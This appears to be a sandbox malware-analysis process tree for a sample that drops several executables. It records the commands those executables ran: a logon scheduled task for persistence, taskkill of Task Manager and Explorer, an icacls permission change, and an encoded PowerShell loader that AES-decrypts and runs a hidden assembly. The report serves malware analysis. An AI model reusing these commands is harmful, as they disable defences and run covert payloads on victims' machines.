C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3892 /prefetch:16⤵PID:5216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4368 /prefetch:16⤵PID:1180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:6120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
PID:3400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:26⤵PID:4740
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\helper.vbs"5⤵PID:3952
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\spinner.gif5⤵
- Modifies Internet Explorer settings
PID:4936
-
-
C:\Windows\system32\timeout.exetimeout /t 155⤵
- Delays execution with timeout.exe
PID:4632
-
-
C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\scary.exescary.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5604 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
PID:5368
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5700 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
PID:5888
-
-
-
-
C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\the.exethe.exe5⤵
- Executes dropped EXE
PID:5360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5368
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5988
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5540
-
-
C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\ac3.exeac3.exe5⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:5900
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im fontdrvhost5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5984
-
-
C:\Windows\system32\icacls.exeicacls c:\Windows\explorer.exe /grant Admin:(F,M)5⤵
- Modifies file permissions
PID:4240
-
-
C:\Windows\system32\timeout.exetimeout /t 155⤵
- Delays execution with timeout.exe
PID:3832
-
-
C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\jaffa.exejaffa.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5652 -
C:\Windows\SysWOW64\ccqytjrniv.execcqytjrniv.exe6⤵
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Windows security modification
- Enumerates connected drives
- Modifies WinLogon
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:796 -
C:\Windows\SysWOW64\xpxlzrjv.exeC:\Windows\system32\xpxlzrjv.exe7⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5580
-
-
-
C:\Windows\SysWOW64\sphkjhlphydlbbz.exesphkjhlphydlbbz.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1768
-
-
C:\Windows\SysWOW64\xpxlzrjv.exexpxlzrjv.exe6⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2784
-
-
C:\Windows\SysWOW64\oxurcpmxhhmap.exeoxurcpmxhhmap.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3308
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\mydoc.rtf" /o ""6⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5716
-
-
-
C:\Windows\system32\timeout.exetimeout /t 155⤵
- Delays execution with timeout.exe
PID:5952
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0693d3b6-dec7-4180-915f-a8d126a4fb67\packer.exe"C:\Users\Admin\AppData\Local\Temp\0693d3b6-dec7-4180-915f-a8d126a4fb67\packer.exe" "C:\Users\Admin\AppData\Local\Temp\0693d3b6-dec7-4180-915f-a8d126a4fb67\unpacker.exe" "C:\Users\Admin\AppData\Local\Temp\lol.exe" "loader.exe" "C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5" "" True True False 1 -repack2⤵
- Executes dropped EXE
PID:5048 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 13243⤵
- Program crash
PID:5952
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4896
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1944
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004D8 0x00000000000004C01⤵
- Suspicious use of AdjustPrivilegeToken
PID:5444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5048 -ip 50481⤵PID:1460
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵PID:1812
-
C:\Windows\system32\msinfo32.exe"C:\Windows\system32\msinfo32.exe" "C:\Users\Admin\Desktop\UninstallSubmit.nfo"1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:5976
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\UnblockGroup.mpeg"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:480
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\UninstallSave.ps1xml1⤵
- Opens file in notepad (likely ransom note)
PID:4572
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Sets file execution options in registry
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
PID:1356 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4D5912AEF0BEE17C068738112C8D0D1A2⤵
- Loads dropped DLL
PID:4944
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0CACDFA1BFDCE3A6516A53C0B23256D9 E Global\MSI00002⤵
- Sets file execution options in registry
- Loads dropped DLL
- Registers COM server for autorun
- Modifies Internet Explorer settings
- Modifies registry class
PID:5348
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe" 19.010.20069 19.010.20069.02⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2164
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2320 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140432⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5436 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=088B5DD25CEE1E08E16024352AA2F9E5 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3068
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=B0539E22F58741F83D1C4F15DE677D39 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=B0539E22F58741F83D1C4F15DE677D39 --renderer-client-id=2 --mojo-platform-channel-handle=1788 --allow-no-sandbox-job /prefetch:13⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5964
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A546A07051CFAC09C5B438F22FEBCB95 --mojo-platform-channel-handle=2312 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3912
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=562B0D18C7314A0D42AF290401B868AB --mojo-platform-channel-handle=1948 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
- Executes dropped EXE
PID:744
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=353678BF651C2637CC05A27AFCFEB577 --mojo-platform-channel-handle=2452 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
- Executes dropped EXE
PID:5740
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2504
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:5676
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5840 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.0.501419435\519806322" -parentBuildID 20230214051806 -prefsHandle 1752 -prefMapHandle 1744 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {142513f3-bd6b-4ff1-b61c-7310a9f979e8} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 1832 26766924458 gpu3⤵PID:4140
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.1.1019394367\437426329" -parentBuildID 20230214051806 -prefsHandle 2344 -prefMapHandle 2340 -prefsLen 22110 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c1ce38bc-76bf-428f-a14e-f667f95d0655} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 2356 26759c88d58 socket3⤵
- Checks processor information in registry
PID:5796
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.2.970634700\618294786" -childID 1 -isForBrowser -prefsHandle 3144 -prefMapHandle 2920 -prefsLen 22252 -prefMapSize 235121 -jsInitHandle 1336 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5bb76479-fc77-4a6b-aa3a-f885df0cd519} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 2860 26769809558 tab3⤵PID:2420
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.3.997608659\1959745580" -childID 2 -isForBrowser -prefsHandle 3804 -prefMapHandle 3800 -prefsLen 27652 -prefMapSize 235121 -jsInitHandle 1336 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4bc4415f-ac9d-4433-8fa5-3e2a9c074348} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 3816 2676bef1158 tab3⤵PID:4468
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.4.1248705250\212141891" -childID 3 -isForBrowser -prefsHandle 5300 -prefMapHandle 5240 -prefsLen 27652 -prefMapSize 235121 -jsInitHandle 1336 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cbc22f22-5a9f-4ada-ac4f-28878ddc9251} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 4612 267681cd358 tab3⤵PID:5800
-
-
